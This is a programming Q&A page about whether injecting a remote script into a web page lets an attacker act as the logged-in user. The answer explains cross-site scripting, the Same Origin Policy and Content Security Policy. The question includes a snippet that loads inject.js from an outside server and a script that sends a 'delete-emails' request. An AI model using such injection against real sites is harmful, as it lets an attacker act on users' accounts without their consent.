Search code examples
javascriptsecuritygoogle-chrome-extensionsame-origin-policyjavascript-injection

Remote control via script injection

Some servers allow us to dynamically insert script element with src different from page's domain.

We can't send data to another server due to Same Origin Policy, but we can do things like:

  • delete all emails in some mailservice
  • make some orders on shop
  • write messages on socialnetwork and so on...

Cause script was injected into page x from server A, and requests are doing to server A, nothing is wrong here - Same Origin Policy doesnt work.

Are servers not protected from this by default?

On protected servers we got this:

Refused to load the script because it violates the following Content Security Policy directive: "script-src 'unsafe-eval' 'unsafe-inline'

q=document.createElement('script');
q.src='http://myserver.com/inject.js';
document.head.append(q);

Such script can be wrapped into chrome extension and installed. (Am i wrong here or maybe extensions got some more restrictions?)

And here is inject.js assuming server is processing request with delete-emails param:

var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://stackoverflow.com/?delete-emails');
xhr.onreadystatechange = function() {
    if (this.readyState === 4 && this.status === 200) {
        console.log(location.href);
    }
};
xhr.send();

For example, if I insert script element(into head) into stackoverflow.com page, I get 200 OK.

Solution

  • Cause script was injected into page x from server A, and requests are doing to server A, nothing is wrong here - Same Origin Policy doesnt work.

    Are servers not protected from this by default?

    That's right. What you're describing is Cross-site Scripting (XSS), and the Same Origin Policy doesn't protect you from it.

    On protected servers we got this:

    Refused to load the script because it violates the following Content Security Policy directive: "script-src 'unsafe-eval' 'unsafe-inline'

    The Content Security Policy is different from the Same Origin Policy. It's a mechanism to allow servers to declare limits on what their pages are allowed to do. That helps to prevent XSS, since even if an attacker is able to inject a script the browser won't allow it to violate the CSP.

    Such script can be wrapped into chrome extension and installed.

    In general you should assume that browser extensions allow all kinds of unsafe actions that are immune from the usual browser security policies. Different browser extension frameworks make different security guarantees, but it's not something that's standardized across browsers. If you have a specific question about what is allowed by Chrome you should probably post a separate question.